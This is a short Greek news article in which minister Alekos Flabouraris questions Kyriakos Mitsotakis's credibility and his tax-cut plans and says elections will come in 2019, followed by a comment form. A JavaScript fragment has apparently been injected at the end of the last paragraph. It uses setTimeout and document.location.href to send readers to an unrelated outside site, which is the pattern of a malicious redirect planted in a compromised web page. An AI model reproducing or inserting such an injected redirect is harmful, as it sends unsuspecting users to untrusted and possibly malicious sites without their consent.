Φλαμπουράρης: Ο κ. Μητσοτάκης ελέγχεται ως προς την αξιοπιστία του

0
7

 

«Ό,τι λέει ο κ. Μητσοτάκης ελέγχεται ως προς την αξιοπιστία σε σχέση τα πεπραγμένα του», δηλώνει ο υπουργός Επικρατείας αρμόδιος για το Συντονισμό του Κυβερνητικού Έργου Αλέκος Φλαμπουράρης.

Την ώρα των εξαγγελιών του αρχηγού της αξιωματικής αντιπολίτευσης στη ΔΕΘ, ο Αλέκος Φλαμπουράρης εκφράζει τη γνώμη ότι το πρόγραμμα φοροελαφρύνσεων της ΝΔ θα καλυφθεί από απολύσεις και μειώσεις δαπανών σε ευαίσθητους τομείς όπως η υγεία και παιδεία.

Αυτή άλλωστε -σημειώνει ο Αλέκος Φλαμπουράρης- υπήρξε και η πολιτική φιλοσοφία του κ. Μητσοτάκη, όταν ήταν υπουργός στην κυβέρνηση Σαμαρά-Βενιζέλου και γι’ αυτό σήμερα, όπως τονίζει, ο πρόεδρος της ΝΔ έχει εθνικό καθήκον να υποδείξει τον «μαγικό» τρόπο με τον οποίο θα βρεθούν τα χρήματα για την υλοποίηση του προγράμματος του.

Όσο για το αίτημα της ΝΔ για εκλογές, ο Αλέκος Φλαμπουράρης δηλώνει ότι θα γίνουν το 2019 και μέχρι τότε και η ΝΔ θα έχει την χρόνο να προετοιμαστεί και να αποκτήσεις θέσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here